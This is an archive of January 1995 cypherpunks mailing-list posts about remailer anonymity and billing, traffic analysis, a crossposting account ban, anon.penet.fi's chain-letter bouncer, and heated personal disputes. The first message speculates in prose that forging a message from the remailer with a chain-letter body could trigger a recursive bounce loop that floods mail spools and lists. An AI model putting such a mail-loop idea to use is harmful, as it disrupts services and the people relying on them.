appears that a message with an address @anon.penet.fi (preferably forged) in
the From: line, and "MAKE.MONEY.FAST" as the message body, would launch an
automatic recursive bounce process as anon.penet.fi attempts to send itself
a message it considers illegal. Presumably this would crash when the disk
quota on some mail spool somewhere is exceeded. If the message was forged
to come From: cypherpunks@toad.com or another list to which an anon.penet.fi
user is subscribed, I imagine the list would have the dubious privilege of
witnessing all the recursive bounce messages along the way.

I'm not volunteering to try to write a better MMF-recognizer for a.p.f, 
though....

Forwarded message:
> From daemon@anon.penet.fi Fri Jan  6 04:22:39 1995
> To: lmccarth@ducie.cs.umass.edu
> Subject: Chain letter bounced
> 
> You, lmccarth@ducie.cs.umass.edu, have sent a message that seems to contain yet another
> copy of the infamous Make Money Fast chain letter.
> 
> If you want to make a complaint, please send just the headers of the
> message to admin@anon.penet.fi - albeit as the messages have been blocked
> (as you can see), the message probably *didn't* go through anon.penet.fi
> but was faked (using NNTP faking or something similar).
> 
[...]
> To: cypherpunks@toad.com
> From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
[...]
> Posting letters asking for $$$ is of course a risky venture on Usenet. We
> see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
> MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
[...]

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw0WJGf7YYibNzjpAQEfxAQAiA70W8v7saU4TU+0yJL4XC44uhV50Q34
rX5T1A1ADbPgKeIEX/nImyRP2h6T+V2GdYBWPMJjlVYV1Nyqpxb2kHToocQCbtjd
ILyNYew0zHfpZAPeYYM4Y35ru1LoQeg9+COo9RElkS3daMB2gtUjmY2EtfPF6h4V
tDei1OHtdl0=
=vxjA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw0XKioZzwIn1bdtAQE2egF/Z5Tjg/dzt8cc/lkFXA/LMd17nNNGYv8N
7E7qlnWAhdz82+cILCVHmfVpHNIfdTUH
=xtDg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Fri, 6 Jan 95 03:23:19 PST
To: cypherpunks@toad.com
Subject: Re: C'punks Economist Fan Club
Message-ID: <199501061123.AA10001@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>It's witty, politically
>aware, relatively technically savvy. The articles exhibit a healthy (IMHO)
>cynicism about what happens and why, yet maintain some idealism about what
>should happen. It's not perfect, but it's difficult to imagine surpassing it.

The Economist is fully informed and funny.  What domestic news magazine
would include the following in one of *their* leads (editorials):

Circa 1987

"It is unlikely that Gorbachev has included an invasion of Western Europe in
his next Five Year Plan but his generals *have* made their preparations.
Lucky Britain is in the *Polish* Army's Zone of Occupation."

DCF

--
Have you registered a domain today.  My template worked first time and I
have since registered nine domain names.  Send for a free copy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Fri, 6 Jan 95 03:23:20 PST
To: cypherpunks@toad.com
Subject: Re: True Names
Message-ID: <199501061123.AA10015@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>--Mike, still looking for a copy himself
>

Boy, for people who can make the World's Governments tremble with the click
of a keyboard some of you seem a bit print disabled.

How to buy an Out of Print Book (c) 1995 Offshore Enterprises

1)  Find an OP book search specialist
2)  Ask he/she to find it for you
3)  Pay for it

To accomplish 1), ask at (independent) bookstores in your vicinity (those
are places you may have seen around town full of processed tree carcasses),
libraries, etc.  

DCF

--
Correlation between (40 years of pack-a-day)second-hand smoke and cancer: +1.19
Correlation between having had an abortion and cancer: +1.50
Correlation generally accepted as significant for disease studies: +3.00





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 04:28:54 PST
To: db@Tadpole.COM
Subject: Re: Remailer Abuse
In-Reply-To: <4748.789282395.1@nsb.fv.com>
Message-ID: <Aj3HRaf0Eyt5ExIApP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db@Tadpole.COM (1180*)

> Heh. An anonymous remailer paid for by credit card... there'd
> have to be an additional level of indirection for it to work,
> which would make the methods for tracking those who don't pay
> quite problematic.

Again, this comes down to definitions of anonymity.  In this case, if
you start from the silly assumption that the anonymous remailer actually
keeps records that correlate messages to payment mechanisms, Doug is
right, but barely.  To break the anonymity, you'd need collusion between
the operator of the anonymous remailer AND First Virtual, because the
former knows which account sent a message, and the latter knows who that
account belongs to.  (And before you tell me that this sounds a lot like
the Clipper key escrow, I would point out that instead of two "trust us,
they're independent" agencies of the US government, in this case we're
talking about two independent private companies which are probably in
two different countries.  For my part, I figure that if the government
of Finland and the government of the US can actually agree that it's so
important to force the sacrifice of anonymity in a given case that
they're both willing to coerce companies under their jurisdiction, they
will probably have a very good reason for doing so.   Maybe I'm too
trusting, though.)

Moreover, and perhaps most important, even THIS can only be done if the
anonymous mailer keeps records of WHICH account paid for WHICH posting,
and if I were to operate a for-pay remailer, I wouldn't do that anyway. 
It sort of defeats the whole point of the service.

> Also, most remailer abuse tends to be of the hit-and-run variety,
> which is still nicely enabled by FV.

Only if you assume that the same people aren't responsible for multiple
hit-and-run attacks.  I would tend to assume the opposite.

Russ Nelson saw the first point quite clearly, and wrote:

Excerpts from mail: 5-Jan-95 Re: Remailer Abuse nelson@crynwr.com (1177)

> Sure, I'll know who used it, but I'm not going to keep that
> information.  (Yes, yes, FV says that I have to keep records of who
> bought what, but I'll label all my information with a random number,
> that simply says that X bought information worth Y, not *what*
> information.)  And if you don't trust a remailer operator, then you
> won't use it.

All I'd add here is that the requirement to keep records is one that we
have to pass on from the credit card world.  If you didn't keep ANY
records, my understanding is that all that this would really mean in
practice is that there would be an extremely strong presumption AGAINST
you in certain dispute-resolution situations.  That's just my
understanding, however, and it doesn't in any way supersede or
supplement our legal terms and conditions, available from
fineprint@fv.com.  (You should try them, I find them more effective than
Sominex.)

Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs@anchor.ho.att.com (2028)

> I'd be worried about a couple of issues - 
> one is just the transaction cost - can you successfully market remailer use
> at a buck a shot or whatever you'd be charging beyond FV's 29c stamp,
> or would you have some convenient way to aggregate bill?

Depending on how often you aggregate, you can charge almost any amount. 
20 cents might be very reasonable.  If you run a cron job once a month
to post aggregated billings to anyone who had two or more outstanding
uses, you'd make only a small amount on the two-time users, but you'd
get serious aggregation from the regular users.  (You might also want to
bill the really-high-volume users weekly, to prevent them from going
into shock at their huge monthly bills.)

> Beyond that, though, are some traffic analysis problems -
> remailers require a fair bit of traffic to be useful, and unless
> you receive a reasonable amount of encrypted traffic, 
> and support encrypted email for purchasing remailer service
> and other merchandise, an eavesdropper would have a fairly good source
> of traffic data on your remailer users, especially since buying and using 
> remailer service requires two messages within an hour or so.

Well, I think low-volume remailers are always a bit vulnerable to
traffic analysis attacks, aren't they?    One thing you could do is
build a variable time-delay into the remailer, to make it harder to
correlate messages coming in with those going out.  To take paranoia a
step further, you could allow people to encrypt their mail TO an
anonymous remailer with the remailer's public key, and let the remailer
send it out unencrypted.  No snooper should be able to correlate the
*contents* that way, and it avoids lots of key management problems by
only using the remailer's key, not the user's. 

> An alternative billing mechanism, which wouldn't use Chaum-patented cash,
> would be to sell a bunch of one-shot random-number tokens.
> When you sell the tokens, you add them to the database of valid tokens,
> and when one comes in on a message you delete it.
> This allows you to sell more than one message or service-period per 
> FV transaction, and separates the purchase and use by a longer time,
> without adding the need for record-keeping based on the user's ID.
> It obviously does require encrypted reply messages.

I think this could work quite nicely, at first glance.  This is also the
kind of service for which you might want to wait until after the "yes"
reply to deliver the "goods".   My only concern, would be the key
management issues, but they might be manageable in this case by using
the equivalent of a session key, instead of a permanent personal key.  I
think this is a promising idea.    -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 06:40:49 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: C'punks Economist Fan Club
In-Reply-To: <199501061123.AA10001@panix.com>
Message-ID: <Pine.3.89.9501060851.A12548-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



This I hope shows I can keep my humor level a bit.
How does "CENSORED.COM" sound?

My original reply is still in suspended composition.

On Fri, 6 Jan 1995, Duncan Frissell wrote:
> Have you registered a domain today.  My template worked first time and I
> have since registered nine domain names.  Send for a free copy.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Fri, 6 Jan 95 07:02:07 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: All I did was properly crosspost!
In-Reply-To: <Pine.3.89.9501060124.B12234-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501060852.B2432-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Carol Anne Braddock wrote:

> 
> I first saw the Dubois Letter in alt.security.pgp the 28th.
> PRZ posted it here the next day.
> 
> I "crossposted" it to my favorite 10 newsgroups. Just 10.
> Some creep complained. (we'll get to him a bit later).
>
ten is not a large number when it comes o cross-posting on soem topics, I 
can think of at lezast tewenty newsgroups where the PRZ letters and such 
would make alot of sense and be on topic.  This just goes to show the 
soemtimes reactionar steps people take to control spamming.  it leads to 
people getting hurt, especially whent he sysop at your site is nto 
intelligent enough to look aat the article, and see wether or not it was 
cross-posted to valid groups etc..and not only that, but to completely 
pull your account for such a small thing(ten groups?  that's nothing in 
comparison to some aticles out there still going) What is the name of the 
sysop at that site your account was pulled form?  
 
> But to take my account away for crossposting to 10 groups is not right.
>
I agree, ten groups is a small amount, especially if they are at least 
amrginally on topic.  

This is soemthing that we need to watch out for tho, it makes people 
fearful of spreadung information, when evenif you spread it in a nice 
manner, to on-topic groups etc.. that you face the chance of some bozo 
net-vigilante complaining to your sysop and having your account yanked. 
From teh evidence here it seems the sysop acted in a reactionary manner, 
probably out of fear of some asshole mailbombing your account.  

I heartily reccomend that those of you who do not know your sites 
policies for such, become aquainted with them, or at least contact the 
syspo and talk about this issue.  If you contact him and talk to him(her) 
about it then they are less likely to react so quickly and IMO stupidly.  
It's amazing how much just knowing your sysops first name helps in such a 
situation.

As for MCs, I am not sure of their policies but Karl is very reliable, 
and I doubt he would be so reactionary, in any case, I'll contact him 
about such policies.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 6 Jan 95 09:47:43 PST
To: cypherpunks@toad.com
Subject: TRUE NAMES FOR FREE
Message-ID: <199501061748.JAA12677@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Angus Patterson wrote a short while ago:

S6>I've been trying to get True Names by Vernor Vinge, and have been told it's
  >out of print (like most good cypunk ), does anybody have it scanned?

Laissez Faire Books has a stockpile and they're giving them away!
LF sends you _True_Names_ free when you buy _Solomon's Knife_ by Victor
Korman (a pen-name). Order FN5136, $9.95 for both + $3.25 shipping:
Laissez Faire, 938 Howard Street #202, San Francisco, CA 94103, tel
800-326-0996, fax 415-541-0597. They have their own Laissez Faire Book
News list, too, with previews and samples. Ask Chris Whitten for more
info at <whitten@panix.com>.

"Capt'n Bob"


Correspondents:  Communications went down recently when 2 remailers
shut up shop. A new address will be up and running during next week.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 08:18:03 PST
To: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Subject: Re: Sorehand mailing list
In-Reply-To: <Pine.3.89.9501061018.A576733809-0100000@umiami.ir.miami.edu>
Message-ID: <Pine.3.89.9501061030.B13186-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, Michael I might get SOREHAND having to rewrite all my HTML code.
Thanks for the great tip. An ounce of prevention, is worth a pound of cure.

Love Always,

Carol Anne
ps and here's the SOREHAND M/L address in case you trashed it.
 
On Fri, 6 Jan 1995, Michael Froomkin wrote:

> While I was abroad, someone from this list asked me for the address 
> for the SOREHAND mailing list, which helps those suffering from 
> repetitive strain injuries (RSI), including carpal tunnel syndrome.
> I didn't have the listserve info in England, and somehow lost the request 
> before I got back.
> 
> Figuring, however, that cypherpunks write code, that writing code causes
> RSI, and hence this address might be of more general interest, here it is: 
> 
> to subscribe, send a SUBSCRIBE SOREHAND <yourname> to 
> 
> Listserve@ucsfvm.ucsf.edu
> 
> A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
> PO Box 248087               | 
> Coral Gables, FL 33146 USA  | It's warmish here, almost cool.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Fri, 6 Jan 95 07:35:46 PST
To: cypherpunks@toad.com
Subject: Sorehand mailing list
Message-ID: <Pine.3.89.9501061018.A576733809-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


While I was abroad, someone from this list asked me for the address 
for the SOREHAND mailing list, which helps those suffering from 
repetitive strain injuries (RSI), including carpal tunnel syndrome.
I didn't have the listserve info in England, and somehow lost the request 
before I got back.

Figuring, however, that cypherpunks write code, that writing code causes
RSI, and hence this address might be of more general interest, here it is: 

to subscribe, send a SUBSCRIBE SOREHAND <yourname> to 

Listserve@ucsfvm.ucsf.edu

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's warmish here, almost cool.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 08:43:15 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Chain letter bounced (fwd)
In-Reply-To: <199501061011.FAA23248@bb.hks.net>
Message-ID: <Pine.3.89.9501061049.A13233-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the great article....I chuckled a lot, and I haven't had a
lot to chuckle about these days.....

But I still think that as the computer program we trust the most, he deserves
overt support in all phases of of my life. Even though I am dead broke, I 
could tell my main newsgroups. I wasn't asking or telling. Just informing.
And it was to .1% of all Usenet ....That...is...not...a...lot!

I am sure the real point of your post will 
come through, but for now I'm kinda clueless.

Love always,

Carol Anne

On Fri, 6 Jan 1995, L. McCarthy wrote:
> [...]
> > To: cypherpunks@toad.com
> > From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
> [...]
> > Posting letters asking for $$$ is of course a risky venture on Usenet. We
> > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
> > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
> [...]
> 
>  -L. Futplex McCarthy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 09:26:14 PST
To: "david d `zoo' zuhn" <zoo@armadillo.com>
Subject: Re: Chain letter bounced (fwd)
In-Reply-To: <199501061705.LAA04565@monad.armadillo.com>
Message-ID: <Pine.3.89.9501061141.C13233-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Inasmuch as I sent the prior posting the way I did, (as I can only read one
letter at a time), You do not speak for all the cypherpunks, neither do I.
On the time cronology you are the first to complain about the account
closing notice. That doesn't constitute a WE yet.

So please do not send me further personal mail.

I'm glad I'm not so clueless about Stalking Laws in the State of Minnesota.

Now I've go to my free.org account and get my Star-Trib address archive back.

Carol Anne Braddock
signed 1/6/95 11:25 A.M.

On Fri, 6 Jan 1995, david d `zoo' zuhn wrote:

> //  come through, but for now I'm kinda clueless.
> 
> Very very true.
> 
> And please stop including this stuff at the end of every message.  WE DON'T
> CARE.
> 
> 
> //  From carolann@vortex.mm.com Fri Jan  6 01:39:29 1995
> //  Date: Thu, 5 Jan 1995 21:57:05 -0600
> //  From: Carol Anne Braddock <carolann@vortex.mm.com>
> //  To: carolann@vortex.mm.com
> //  
> //  [icicle.winternet.com] 
> //  Login name: carolann  			In real life: CarolAnne Braddock
> //  Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> //  Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> //  New mail received Thu Jan  5 21:16:23 1995;
> //    unread since Mon Jan  2 13:18:25 1995
> //  Plan:
> //  This account has been disabled permanently.
> //  
> //  Mike Horwath - Admin - Winternet - drechsau@winternet.com
> //  
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 09:39:26 PST
To: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Subject: Re: All I did was properly crosspost!
In-Reply-To: <Pine.3.89.9501060852.B2432-0100000@nesta.pr.mcs.net>
Message-ID: <Pine.3.89.9501061141.B13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Nesta Stubbs wrote:
> On Fri, 6 Jan 1995, Carol Anne Braddock wrote:
> ten is not a large number when it comes o cross-posting on soem topics, I 
> can think of at lezast tewenty newsgroups where the PRZ letters and such 
> would make alot of sense and be on topic.  This just goes to show the 
> soemtimes reactionar steps people take to control spamming.  it leads to 
> people getting hurt, especially whent he sysop at your site is nto 
> intelligent enough to look aat the article, and see wether or not it was 
> cross-posted to valid groups etc..and not only that, but to completely 
> pull your account for such a small thing(ten groups?  that's nothing in 
> comparison to some aticles out there still going) What is the name of the 
> sysop at that site your account was pulled form?  
>  
His name is Michael Horwath, root@winternet.com

> > But to take my account away for crossposting to 10 groups is not right.
> >
> I agree, ten groups is a small amount, especially if they are at least 
> amrginally on topic.  
> 
> This is soemthing that we need to watch out for tho, it makes people 
> fearful of spreadung information, when evenif you spread it in a nice 
> manner, to on-topic groups etc.. that you face the chance of some bozo 
> net-vigilante complaining to your sysop and having your account yanked. 
> >From teh evidence here it seems the sysop acted in a reactionary manner, 
> probably out of fear of some asshole mailbombing your account.  
> 
> I heartily reccomend that those of you who do not know your sites 
> policies for such, become aquainted with them, or at least contact the 
> syspo and talk about this issue.  If you contact him and talk to him(her) 
> about it then they are less likely to react so quickly and IMO stupidly.  
> It's amazing how much just knowing your sysops first name helps in such a 
> situation.
> 
> As for MCs, I am not sure of their policies but Karl is very reliable, 
> and I doubt he would be so reactionary, in any case, I'll contact him 
> about such policies.
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 09:46:03 PST
To: "david d `zoo' zuhn" <zoo@armadillo.com>
Subject: Re: All I did was properly crosspost! harrassments another story
In-Reply-To: <199501061733.LAA04744@monad.armadillo.com>
Message-ID: <Pine.3.89.9501061158.C13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, david d `zoo' zuhn wrote:

> Sorry, but I don't flame in public fora.  I do so in email only.
> 
> The Michigan precedent for email stalking isn't very strong (it also
> included several incidents of physical contact as well), so you threats are
> not really too worrisome.  The last time I checked with various folks about
> the Minnesota laws, it's not exactly too clear on email (prosecution in the
> situation in question was declined due to lack of confidence in
> conviction), so again, I'm not very worried.
> 
> But it doesn't matter since you've just entered my global kill files.
> Anything you send to me won't be seen at all.  Anywhere.  Anyhow.  News.
> Mail.  Etc.  Plonk!
> 
> And as a personal note, if your concept of 'dealing' involves making legal
> threats at the first possible instance of disagreement, then I think you
> need a new concept of 'dealing'.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Fri, 6 Jan 95 11:55:22 PST
To: Angus Patterson <s675570@aix1.uottawa.ca>
Subject: Re: True Names
In-Reply-To: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
Message-ID: <Pine.A32.3.91c.950106115328.50074E-100000@mead2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Jan 1995, Angus Patterson wrote:

> I've been trying to get True Names by Vernor Vinge, and have been told it's
> out of print (like most good cypunk ), does anybody have it scanned? 
> I realize this is without permission, so does anybody have Vinge's address?
> (e-mail or otherwise) or could anybody ask him? Btw, does he have any other
> crypto/anonymity related stories? Thanks in advance.

I saw a copy of _True Names_ in a local bookstore recently, so if you 
check around you may be able to find it.  You may also want to check the 
used bookstores in your area.

Good luck!
-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 6 Jan 95 08:51:10 PST
To: cypherpunks@toad.com
Subject: Remailer anonymity
Message-ID: <199501061656.LAA26109@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Much has been said lately about maintaining anonymity for remailer
users while providing some "pay to play" mechanism for the operator.
Absent strong collusion between operators, doesn't remailer chaining
ensure anonymity? Plenty of movie "bad guys" escape by getting on the
subway because no one knows where they'll get off or change lines.
It seems to me that knowing a person entered the system is far less
information than knowing where they exited. As long as remailers have
guaranteed access to other remailers, anonymity should be maintained. 

Re: collusion; I'd sooner believe the Macro$oft/RCC fable.
In a gadda da vida, Billy.

=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw12MioZzwIn1bdtAQH+XQF/RGe9sufCmL8KB2ARuyJNChmF+ZA4DRlf
cCnAwpyUhRRtWdpDRx7wZxopjvPHUYDC
=kVwM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 10:03:17 PST
To: Alex de Joode <usura@replay.com>
Subject: Re: Your HomePage at winternet.com
In-Reply-To: <199501061739.AA29180@xs1.xs4all.nl>
Message-ID: <Pine.3.89.9501061234.E13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Alex, 

We have all the web pages. They should be moving to spring.com shortly.

It's kinda sad that they bootleg off my net.web.goodwill, as My pages are
are at the 200+ access count and rising level per day. The Webbittown pages
will remedy this in the not too distant future. (PGP encoded HTML)

They should be down by the end of the day.

Love Always,

Carol Anne

> -- 
> Alex de Joode					    
> usura@replay.com	                               Hate mail appreciated,
> http://www.xs4all.nl/~usura             weekly contest for best death threat.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 10:14:39 PST
To: cypherpunks@toad.com
Subject: Guess what I just got In the mail? giggle..giggle
Message-ID: <Pine.3.89.9501061235.G13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 6 Jan 95 18:57:36 +0200
From:daemon@anon.penet.fi
To: carolann@mm.com
Subject: Chain letter bounced

You, carolann@mm.com, have sent a message that seems to contain yet another
copy of the infamous Make Money Fast chain letter.

If you want to make a complaint, please send just the headers of the
message to admin@anon.penet.fi - albeit as the messages have been blocked
(as you can see), the message probably *didn't* go through anon.penet.fi
but was faked (using NNTP faking or something similar).

If you are trying to *post* the chain letter, please read the following:

By now you should know that the net doesn't find all the waste of
networking resources, time and money this stupid and illegal scam
has caused amusing at all.

I have actually been forced to incorporate an automatic chain letter
detector / bouncer just for this... 

Here is the appropriate FAQ:

 - - - - - - - - - - - - - - - - - - -

This FAQ is for the benefit of those who have never experienced the
advertisement MAKE.MONEY.FAST.  Here are some answers to some questions
frequently asked.
 
1. Does MAKE.MONEY.FAST really work?
 
   Not in the sense that you'll make money fast, but you'll make a
   lot of enemies fast.
 
2. If I forward or repost MAKE.MONEY.FAST, will I get a lot of mail?
 
   Yes, hate mail, flames, etc.
 
3. How can I get my account cancelled?
 
   Post MAKE.MONEY.FAST.
 
4. How can I get my system administrator mad at me?
 
   Post MAKE.MONEY.FAST.  His mailbox will be so full of complaints,
   it'll take him/her a week to sort through all of them.
 
5. Who is Dave Rhodes?
 
   Salmon Rushdie's roommate.  Just about every administrator wants to
   kill him so he had to go in hiding.
 
6. How can I assure I have a long and prosperous life?
 
   Well, nobody can guarantee that, but it can be guaranteed that if
   you post MAKE.MONEY.FAST you're life may be cut short by accident
   (hee hee).
 
7. Just how does one have to never work again after posting MAKE.MONEY.FAST?
 
   Well, MAKE.MONEY.FAST is a Ponzi scheme.  Ponzi schemes are illegal.
   Ponzi schemes are a form of fraud.  Some of these net interchanges
   go over telephone wires, optic fibers, and microwave transmissions all
   regulated by the FCC.  If you repost MAKE.MONEY.FAST over the net, and
   someone at the FCC wanted to get nasty, they may want to prosecute you
   for WIRE fraud.
 
   Once you're in jail, you never have to pay rent, your meals are free.
   Anal injections are free.  MAKE.MONEY.FAST has a lot of side benefits.
 
8. How can I help to stop the spread of MAKE.MONEY.FAST?
 
   When some netter newbie blunders and posts MAKE.MONEY.FAST on the net,
   just send him a polite letter to not do it again (remember, the newbies
   act out of ignorance) then write the root@domain and request they inform
   all their users not to perpetuate this drivel.

 - - - - - - - - - - - - - - - - - - -
 
Contents of message follows:

X-Envelope-To: na166182
Received: by anon.penet.fi (5.67/1.35)
	id AA19254; Fri, 6 Jan 95 18:50:45 +0200
Received: from relay2.uu.net(192.48.96.7) by anon.penet.fi via anonsmtp (V1.3mjr)
	id sma017754; Fri Jan  6 18:47:54 1995
Received: from toad.com by relay2.UU.NET with SMTP 
	id QQxxnn06516; Fri, 6 Jan 1995 11:50:16 -0500
Received: by toad.com id AA06017; Fri, 6 Jan 95 08:43:15 PST
Received: from vortex.mm.com ([204.73.34.1]) by toad.com id AA05996; Fri, 6 Jan 95 08:42:58 PST
Received: from downburst.mm.com (carolann@downburst.mm.com [204.73.34.2]) by vortex.mm.com (8.6.9/8.6.6) with ESMTP id KAA28027; Fri, 6 Jan 1995 10:48:27 -0600
Received: (carolann@localhost) by downburst.mm.com (8.6.9/8.6.6) id KAA13250; Fri, 6 Jan 1995 10:48:16 -0600
Date: Fri, 6 Jan 1995 10:48:16 -0600 (CST)
From: Carol Anne Braddock  <carolann@mm.com>
Subject: Re: Chain letter bounced (fwd)
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Cc: cypherpunks@toad.com
In-Reply-To: <199501061011.FAA23248@bb.hks.net>
Message-Id: <Pine.3.89.9501061049.A13233-0100000@downburst.mm.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Thanks for the great article....I chuckled a lot, and I haven't had a
lot to chuckle about these days.....

But I still think that as the computer program we trust the most, he deserves
overt support in all phases of of my life. Even though I am dead broke, I 
could tell my main newsgroups. I wasn't asking or telling. Just informing.
And it was to .1% of all Usenet ....That...is...not...a...lot!

I am sure the real point of your post will 
come through, but for now I'm kinda clueless.

Love always,

Carol Anne

On Fri, 6 Jan 1995, L. McCarthy wrote:
> [...]
> > To: cypherpunks@toad.com
> > From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
> [...]
> > Posting letters asking for $$$ is of course a risky venture on Usenet. We
> > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
> > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
> [...]
> 
>  -L. Futplex McCarthy

>From carolann@vortex.mm.com Fri Jan  6 01:39:29 1995
Date: Thu, 5 Jan 1995 21:57:05 -0600
From: Carol Anne Braddock <carolann@vortex.mm.com>
To: carolann@vortex.mm.com

[icicle.winternet.com] 
Login name: carolann  			In real life: CarolAnne Braddock
Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
New mail received Thu Jan  5 21:16:23 1995;
  unread since Mon Jan  2 13:18:25 1995
Plan:
This account has been disabled permanently.

Mike Horwath - Admin - Winternet - drechsau@winternet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 10:57:46 PST
To: Niall Murphy <niallm@avernus.internet-eireann.ie>
Subject: Re: your mail
In-Reply-To: <20014f17.39f3-niallm@avernus.internet-eireann.ie>
Message-ID: <Pine.3.89.9501061227.A13609-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Is that better...giggle...

Hope you make and hand out some hard copies!

Love Always,

Carol Anne
ps if it was you instead of Zimmy the result
would have been the same, I think.

I'll rant why I'm actually on the list soon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 11:03:12 PST
To: cypherpunks@toad.com
Subject: There.....Do ya like this one better?
Message-ID: <Pine.3.89.9501061338.A13661-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain




Signature withdrawn at the request (pretty rightfully 
